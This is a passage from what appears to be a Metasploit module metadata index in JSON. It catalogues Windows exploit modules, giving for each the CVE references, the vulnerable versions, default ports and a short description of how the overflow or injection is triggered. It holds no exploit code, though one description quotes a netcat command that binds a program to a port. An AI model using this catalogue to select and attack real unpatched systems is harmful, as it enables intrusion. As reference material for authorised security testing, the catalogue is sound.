"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.",
"references": [
"CVE-2007-5243",
"OSVDB-38605",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Brute Force",
"Borland InterBase WI-V8.1.0.257",
"Borland InterBase WI-V8.0.0.123",
"Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80",
"Borland InterBase WI-V7.0.1.1",
"Borland InterBase WI-V6.5.0.28",
"Borland InterBase WI-V6.0.1.6",
"Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0",
"Borland InterBase WI-V5.5.0.742",
"Borland InterBase WI-V5.1.1.680",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ib_svc_attach.rb",
"is_install_path": true,
"ref_name": "windows/misc/ib_svc_attach",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ibm_cognos_tm1admsd_bof": {
"name": "IBM Cognos tm1admsd.exe Overflow",
"full_name": "exploit/windows/misc/ibm_cognos_tm1admsd_bof",
"rank": 300,
"disclosure_date": "2012-04-02",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in IBM Cognos Analytic Server\n Admin service. The vulnerability exists in the tm1admsd.exe component, due to a\n dangerous copy of user controlled data to the stack, via memcpy, without validating\n the supplied length and data. The module has been tested successfully on IBM Cognos\n Express 9.5 over Windows XP SP3.",
"references": [
"CVE-2012-0202",
"OSVDB-80876",
"BID-52847",
"ZDI-12-101",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21590314"
],
"platform": "Windows",
"arch": "",
"rport": 5498,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM Cognos Express 9.5 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/ibm_cognos_tm1admsd_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ibm_director_cim_dllinject": {
"name": "IBM System Director Agent DLL Injection",
"full_name": "exploit/windows/misc/ibm_director_cim_dllinject",
"rank": 600,
"disclosure_date": "2009-03-10",
"type": "exploit",
"author": [
"Bernhard Mueller",
"kingcope",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the \"wmicimsv\" service on IBM System Director Agent 5.20.3\n to accomplish arbitrary DLL injection and execute arbitrary code with SYSTEM\n privileges.\n\n In order to accomplish remote DLL injection it uses a WebDAV service as disclosed\n by kingcope on December 2012. Because of this, the target host must have the\n WebClient service (WebDAV Mini-Redirector) enabled. It is enabled and automatically\n started by default on Windows XP SP3, but disabled by default on Windows 2003 SP2.",
"references": [
"CVE-2009-0880",
"OSVDB-52616",
"OSVDB-88102",
"BID-34065",
"URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20090305-2_IBM_director_privilege_escalation.txt",
"URL-https://seclists.org/bugtraq/2012/Dec/5"
],
"platform": "Windows",
"arch": "",
"rport": 6988,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"IBM System Director Agent 5.20.3 / Windows with WebClient enabled"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb",
"is_install_path": true,
"ref_name": "windows/misc/ibm_director_cim_dllinject",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ibm_tsm_cad_ping": {
"name": "IBM Tivoli Storage Manager Express CAD Service Buffer Overflow",
"full_name": "exploit/windows/misc/ibm_tsm_cad_ping",
"rank": 400,
"disclosure_date": "2009-11-04",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service.\n By sending a \"ping\" packet containing a long string, an attacker can execute arbitrary code.\n\n NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order\n for the vulnerable code to be reached. This state doesn't appear to be reachable when the\n TSM server is not running. This service does not restart.",
"references": [
"CVE-2009-3853",
"OSVDB-59632"
],
"platform": "Windows",
"arch": "",
"rport": 1582,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM Tivoli Storage Manager Express 5.3.6.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb",
"is_install_path": true,
"ref_name": "windows/misc/ibm_tsm_cad_ping",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ibm_tsm_rca_dicugetidentify": {
"name": "IBM Tivoli Storage Manager Express RCA Service Buffer Overflow",
"full_name": "exploit/windows/misc/ibm_tsm_rca_dicugetidentify",
"rank": 500,
"disclosure_date": "2009-11-04",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express Remote\n Client Agent service. By sending a \"dicuGetIdentify\" request packet containing a long\n NodeName parameter, an attacker can execute arbitrary code.\n\n NOTE: this exploit first connects to the CAD service to start the RCA service and obtain\n the port number on which it runs. This service does not restart.",
"references": [
"CVE-2008-4828",
"OSVDB-54232",
"BID-34803"
],
"platform": "Windows",
"arch": "",
"rport": 1582,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM Tivoli Storage Manager Express 5.3.6.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb",
"is_install_path": true,
"ref_name": "windows/misc/ibm_tsm_rca_dicugetidentify",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ibm_websphere_java_deserialize": {
"name": "IBM WebSphere RCE Java Deserialization Vulnerability",
"full_name": "exploit/windows/misc/ibm_websphere_java_deserialize",
"rank": 600,
"disclosure_date": "2015-11-06",
"type": "exploit",
"author": [
"Liatsis Fotios <Liatsis Fotios @liatsisfotios>"
],
"description": "This module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization\n call of unauthenticated Java objects exists to the Apache Commons Collections (ACC) library, which allows\n remote arbitrary code execution. Authentication is not required in order to exploit this vulnerability.",
"references": [
"CVE-2015-7450",
"URL-https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java",
"URL-http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability",
"URL-https://www.tenable.com/plugins/index.php?view=single&id=87171"
],
"platform": "Windows",
"arch": "",
"rport": "8880",
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"IBM WebSphere 7.0.0.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ibm_websphere_java_deserialize.rb",
"is_install_path": true,
"ref_name": "windows/misc/ibm_websphere_java_deserialize",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/itunes_extm3u_bof": {
"name": "Apple iTunes 10 Extended M3U Stack Buffer Overflow",
"full_name": "exploit/windows/misc/itunes_extm3u_bof",
"rank": 300,
"disclosure_date": "2012-06-21",
"type": "exploit",
"author": [
"Rh0 <rh0@z1p.biz>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7.\n When opening an extended .m3u file containing an \"#EXTINF:\" tag description,\n iTunes will copy the content after \"#EXTINF:\" without appropriate checking\n from a heap buffer to a stack buffer, writing beyond the stack buffer's boundary,\n which allows code execution under the context of the user.\n\n Please note before using this exploit, you must have precise knowledge of the\n victim machine's QuickTime version (if installed), and then select your target\n accordingly.\n\n In addition, even though this exploit can be used as remote, you should be aware\n the victim's browser behavior when opening an itms link. For example,\n IE/Firefox/Opera by default will ask the user for permission before launching the\n itms link by iTunes. Chrome will ask for permission, but also spits a warning.\n Safari would be an ideal target, because it will open the link without any\n user interaction.",
"references": [
"OSVDB-83220",
"EDB-19322",
"URL-http://pastehtml.com/view/c25uhk4ab.html"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3",
"iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3",
"iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3",
"iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/itunes_extm3u_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/itunes_extm3u_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/landesk_aolnsrvr": {
"name": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow",
"full_name": "exploit/windows/misc/landesk_aolnsrvr",
"rank": 200,
"disclosure_date": "2007-04-13",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending\n an overly long string to the Alert Service, a buffer is overwritten and arbitrary\n code can be executed.",
"references": [
"CVE-2007-1674",
"OSVDB-34964",
"URL-http://www.tippingpoint.com/security/advisories/TSRT-07-04.html"
],
"platform": "Windows",
"arch": "",
"rport": 65535,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Alerting Proxy 2000/2003/XP",
"Alerting Proxy 2003 SP1-2 (NX support)",
"Alerting Proxy XP SP2 (NX support)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/landesk_aolnsrvr.rb",
"is_install_path": true,
"ref_name": "windows/misc/landesk_aolnsrvr",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/lianja_db_net": {
"name": "Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow",
"full_name": "exploit/windows/misc/lianja_db_net",
"rank": 300,
"disclosure_date": "2013-05-22",
"type": "exploit",
"author": [
"Spencer McIntyre"
],
"description": "This module exploits a stack buffer overflow in the db_netserver process, which\n is spawned by the Lianja SQL server. The issue is fixed in Lianja SQL 1.0.0RC5.2.",
"references": [
"CVE-2013-3563",
"OSVDB-93759"
],
"platform": "Windows",
"arch": "x86",
"rport": 8001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Lianja SQL 1.0.0RC5.1 / Windows Server 2003 SP1-SP2",
"Lianja SQL 1.0.0RC5.1 / Windows XP SP3"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/misc/lianja_db_net.rb",
"is_install_path": true,
"ref_name": "windows/misc/lianja_db_net",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-restarts"
]
}
},
"exploit_windows/misc/manageengine_eventlog_analyzer_rce": {
"name": "ManageEngine EventLog Analyzer Remote Code Execution",
"full_name": "exploit/windows/misc/manageengine_eventlog_analyzer_rce",
"rank": 0,
"disclosure_date": "2015-07-11",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a SQL query functionality in ManageEngine EventLog Analyzer v10.6\n build 10060 and previous versions. Every authenticated user, including the default \"guest\"\n account can execute SQL queries directly on the underlying Postgres database server. The\n queries are executed as the \"postgres\" user which has full privileges and thus is able to\n write files to disk. This way a JSP payload can be uploaded and executed with SYSTEM\n privileges on the web server. This module has been tested successfully on ManageEngine\n EventLog Analyzer 10.0 (build 10003) over Windows 7 SP1.",
"references": [
"EDB-38173",
"CVE-2015-7387",
"URL-https://seclists.org/fulldisclosure/2015/Sep/59"
],
"platform": "Windows",
"arch": "x86",
"rport": 8400,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ManageEngine EventLog Analyzer 10.0 (build 10003) / Windows 7 SP1"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb",
"is_install_path": true,
"ref_name": "windows/misc/manageengine_eventlog_analyzer_rce",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/misc/mercury_phonebook": {
"name": "Mercury/32 PH Server Module Buffer Overflow",
"full_name": "exploit/windows/misc/mercury_phonebook",
"rank": 200,
"disclosure_date": "2005-12-19",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in\n Mercury/32 <= v4.01b PH Server Module. This issue is\n due to a failure of the application to properly bounds check\n user-supplied data prior to copying it to a fixed size memory buffer.",
"references": [
"CVE-2005-4411",
"OSVDB-22103",
"BID-16396"
],
"platform": "Windows",
"arch": "",
"rport": 105,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Pro SP0/SP1 English",
"Windows 2000 Pro English ALL"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/mercury_phonebook.rb",
"is_install_path": true,
"ref_name": "windows/misc/mercury_phonebook",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/mini_stream": {
"name": "Mini-Stream 3.0.1.1 Buffer Overflow",
"full_name": "exploit/windows/misc/mini_stream",
"rank": 300,
"disclosure_date": "2009-12-25",
"type": "exploit",
"author": [
"Unknown",
"Ron Henry <rlh@ciphermonk.net>"
],
"description": "This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1\n By creating a specially crafted pls file, an attacker may be able\n to execute arbitrary code.",
"references": [
"CVE-2009-5109",
"OSVDB-61341",
"EDB-10745"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 ENG",
"Windows XP SP2 ENG"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/mini_stream.rb",
"is_install_path": true,
"ref_name": "windows/misc/mini_stream",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/mirc_privmsg_server": {
"name": "mIRC PRIVMSG Handling Stack Buffer Overflow",
"full_name": "exploit/windows/misc/mirc_privmsg_server",
"rank": 300,
"disclosure_date": "2008-10-02",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier.\n By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG\n command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads\n may be necessary. This module is based on the code by SkD.",
"references": [
"CVE-2008-4449",
"OSVDB-48752",
"BID-31552",
"EDB-6666"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/misc/mirc_privmsg_server.rb",
"is_install_path": true,
"ref_name": "windows/misc/mirc_privmsg_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ms07_064_sami": {
"name": "MS07-064 Microsoft DirectX DirectShow SAMI Buffer Overflow",
"full_name": "exploit/windows/misc/ms07_064_sami",
"rank": 300,
"disclosure_date": "2007-12-11",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the DirectShow Synchronized\n Accessible Media Interchanged (SAMI) parser in quartz.dll. This module\n has only been tested with Windows Media Player (6.4.09.1129) and\n DirectX 8.0.",
"references": [
"CVE-2007-3901",
"OSVDB-39126",
"MSB-MS07-064",
"BID-26789"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ms07_064_sami.rb",
"is_install_path": true,
"ref_name": "windows/misc/ms07_064_sami",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ms10_104_sharepoint": {
"name": "MS10-104 Microsoft Office SharePoint Server 2007 Remote Code Execution",
"full_name": "exploit/windows/misc/ms10_104_sharepoint",
"rank": 600,
"disclosure_date": "2010-12-14",
"type": "exploit",
"author": [
"Oleksandr Mirosh",
"James Burton",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in SharePoint Server 2007 SP2. The\n software contains a directory traversal, that allows a remote attacker to write\n arbitrary files to the filesystem, sending a specially crafted SOAP ConvertFile\n request to the Office Document Conversions Launcher Service, which results in code\n execution under the context of 'SYSTEM'.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of SharePoint on Windows 2003 Servers.\n It has been successfully tested on Office SharePoint Server 2007 SP2 over Windows\n 2003 SP2.",
"references": [
"CVE-2010-3964",
"OSVDB-69817",
"BID-45264",
"MSB-MS10-104",
"ZDI-10-287"
],
"platform": "Windows",
"arch": "",
"rport": 8082,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Microsoft Office SharePoint Server 2007 SP2 / Microsoft Windows Server 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ms10_104_sharepoint.rb",
"is_install_path": true,
"ref_name": "windows/misc/ms10_104_sharepoint",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/netcat110_nt": {
"name": "Netcat v1.10 NT Stack Buffer Overflow",
"full_name": "exploit/windows/misc/netcat110_nt",
"rank": 500,
"disclosure_date": "2004-12-27",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in Netcat v1.10 NT. By sending\n an overly long string we are able to overwrite SEH. The vulnerability\n exists when netcat is used to bind (-e) an executable to a port in doexec.c.\n This module tested successfully using \"c:\\>nc -L -p 31337 -e ftp\".",
"references": [
"CVE-2004-1317",
"OSVDB-12612",
"BID-12106",
"EDB-726"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal nc.exe"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/misc/netcat110_nt.rb",
"is_install_path": true,
"ref_name": "windows/misc/netcat110_nt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/nettransport": {
"name": "NetTransport Download Manager 2.90.510 Buffer Overflow",
"full_name": "exploit/windows/misc/nettransport",
"rank": 300,
"disclosure_date": "2010-01-02",
"type": "exploit",
"author": [
"Lincoln",
"dookie"
],
"description": "This exploits a stack buffer overflow in NetTransport Download Manager,\n part of the NetXfer suite. This module was tested\n successfully against version 2.90.510.",
"references": [
"CVE-2017-17968",
"OSVDB-61435",
"EDB-10911"
],
"platform": "Windows",
"arch": "",
"rport": 22222,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/misc/nettransport.rb",
"is_install_path": true,
"ref_name": "windows/misc/nettransport",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/nvidia_mental_ray": {
"name": "Nvidia Mental Ray Satellite Service Arbitrary DLL Injection",
"full_name": "exploit/windows/misc/nvidia_mental_ray",
"rank": 600,
"disclosure_date": "2013-12-10",
"type": "exploit",
"author": [
"Luigi Auriemma",
"Donato Ferrante",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "The Nvidia Mental Ray Satellite Service listens for control commands on port 7414.\n When it receives the command to load a DLL (via an UNC path) it will try to\n connect back to the host on port 7514. If a TCP connection is successful it will\n then attempt to load the DLL. This module has been tested successfully on Win7 x64\n with Nvidia Mental Ray Satellite Service v3.11.1.",
"references": [
"URL-http://revuln.com/files/ReVuln_NVIDIA_mental_ray.pdf",
"OSVDB-100827"
],
"platform": "Windows",
"arch": "",
"rport": 7414,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/nvidia_mental_ray.rb",
"is_install_path": true,
"ref_name": "windows/misc/nvidia_mental_ray",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/plugx": {
"name": "PlugX Controller Stack Overflow",
"full_name": "exploit/windows/misc/plugx",
"rank": 300,
"disclosure_date": "2017-07-27",
"type": "exploit",
"author": [
"Professor Plum"
],
"description": "This module exploits a Stack buffer overflow in the PlugX Controller (C2 server)",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": 13579,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"PlugX Type I (old)",
"PlugX Type I",
"PlugX Type II"
],
"mod_time": "2017-09-04 20:57:23 +0000",
"path": "/modules/exploits/windows/misc/plugx.rb",
"is_install_path": true,
"ref_name": "windows/misc/plugx",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/poisonivy_21x_bof": {
"name": "Poison Ivy 2.1.x C2 Buffer Overflow",
"full_name": "exploit/windows/misc/poisonivy_21x_bof",
"rank": 300,
"disclosure_date": "2016-06-03",
"type": "exploit",
"author": [
"Jos Wetzels"
],
"description": "This module exploits a stack buffer overflow in the Poison Ivy 2.1.x C&C server.\n The exploit does not need to know the password chosen for the bot/server communication.",
"references": [
"URL-http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware"
],
"platform": "Windows",
"arch": "",
"rport": 3460,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Poison Ivy 2.1.4 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/poisonivy_21x_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/poisonivy_21x_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/poisonivy_bof": {
"name": "Poison Ivy Server Buffer Overflow",
"full_name": "exploit/windows/misc/poisonivy_bof",
"rank": 300,
"disclosure_date": "2012-06-24",
"type": "exploit",
"author": [
"Andrzej Dereszowski",
"Gal Badishi",
"juan vazquez <juan.vazquez@metasploit.com>",
"Jos Wetzels"
],
"description": "This module exploits a stack buffer overflow in the Poison Ivy 2.2.0 to 2.3.2 C&C server.\n The exploit does not need to know the password chosen for the bot/server communication.",
"references": [
"OSVDB-83774",
"EDB-19613",
"URL-http://www.signal11.eu/en/research/articles/targeted_2010.pdf",
"URL-http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/"
],
"platform": "Windows",
"arch": "",
"rport": 3460,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1",
"Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1",
"Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/poisonivy_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/poisonivy_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/poppeeper_date": {
"name": "POP Peeper v3.4 DATE Buffer Overflow",
"full_name": "exploit/windows/misc/poppeeper_date",
"rank": 300,
"disclosure_date": "2009-02-27",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in POP Peeper v3.4.\n When a specially crafted DATE string is sent to a client,\n an attacker may be able to execute arbitrary code. This\n module is based off of krakowlabs code.",
"references": [
"CVE-2009-1029",
"OSVDB-53560",
"BID-34093"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"POP Peeper v3.4"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/poppeeper_date.rb",
"is_install_path": true,
"ref_name": "windows/misc/poppeeper_date",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/poppeeper_uidl": {
"name": "POP Peeper v3.4 UIDL Buffer Overflow",
"full_name": "exploit/windows/misc/poppeeper_uidl",
"rank": 300,
"disclosure_date": "2009-02-27",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in POP Peeper v3.4.\n When a specially crafted UIDL string is sent to a client,\n an attacker may be able to execute arbitrary code. This\n module is based off of krakowlabs code.",
"references": [
"OSVDB-53559",
"CVE-2009-1029",
"BID-33926"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"POP Peeper v3.4"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/poppeeper_uidl.rb",
"is_install_path": true,
"ref_name": "windows/misc/poppeeper_uidl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/realtek_playlist": {
"name": "Realtek Media Player Playlist Buffer Overflow",
"full_name": "exploit/windows/misc/realtek_playlist",
"rank": 500,
"disclosure_date": "2008-12-16",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Realtek Media Player(RtlRack) A4.06.\n When a Realtek Media Player client opens a specially crafted playlist, an\n attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-5664",
"OSVDB-50715",
"BID-32860"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Realtek Media Player(RtlRack) A4.06 (XP Pro All English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/realtek_playlist.rb",
"is_install_path": true,
"ref_name": "windows/misc/realtek_playlist",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/sap_2005_license": {
"name": "SAP Business One License Manager 2005 Buffer Overflow",
"full_name": "exploit/windows/misc/sap_2005_license",
"rank": 500,
"disclosure_date": "2009-08-01",
"type": "exploit",
"author": [
"Jacopo Cervini"
],
"description": "This module exploits a stack buffer overflow in the SAP Business One 2005\n License Manager 'NT Naming Service' A and B releases. By sending an\n excessively long string the stack is overwritten enabling arbitrary\n code execution.",
"references": [
"OSVDB-56837",
"CVE-2009-4988",
"BID-35933",
"EDB-9319"
],
"platform": "Windows",
"arch": "",
"rport": 30000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Sap Business One 2005 B1 Universal"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/misc/sap_2005_license.rb",
"is_install_path": true,
"ref_name": "windows/misc/sap_2005_license",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/sap_netweaver_dispatcher": {
"name": "SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow",
"full_name": "exploit/windows/misc/sap_netweaver_dispatcher",
"rank": 300,
"disclosure_date": "2012-05-08",
"type": "exploit",
"author": [
"Martin Gallo",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the SAP NetWeaver Dispatcher\n service. The overflow occurs in the DiagTraceR3Info() function and allows a remote\n attacker to execute arbitrary code by supplying a special crafted Diag packet. The\n Dispatcher service is only vulnerable if the Developer Traces have been configured\n at levels 2 or 3. The module has been successfully tested on SAP Netweaver 7.0 EHP2\n SP6 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass).",
"references": [
"OSVDB-81759",
"CVE-2012-2611",
"BID-53424",
"EDB-20705",
"URL-http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities",
"URL-http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Uncovering_SAP_vulnerabilities_reversing_and_breaking_the_Diag_protocol"
],
"platform": "Windows",
"arch": "",
"rport": 3200,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"SAP Netweaver 7.0 EHP2 SP6 / Windows XP SP3",
"SAP Netweaver 7.0 EHP2 SP6 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb",
"is_install_path": true,
"ref_name": "windows/misc/sap_netweaver_dispatcher",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/shixxnote_font": {
"name": "ShixxNOTE 6.net Font Field Overflow",
"full_name": "exploit/windows/misc/shixxnote_font",
"rank": 500,
"disclosure_date": "2004-10-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in ShixxNOTE 6.net.\n The vulnerability is caused due to boundary errors in the\n handling of font fields.",
"references": [
"CVE-2004-1595",
"OSVDB-10721",
"BID-11409"
],
"platform": "Windows",
"arch": "",
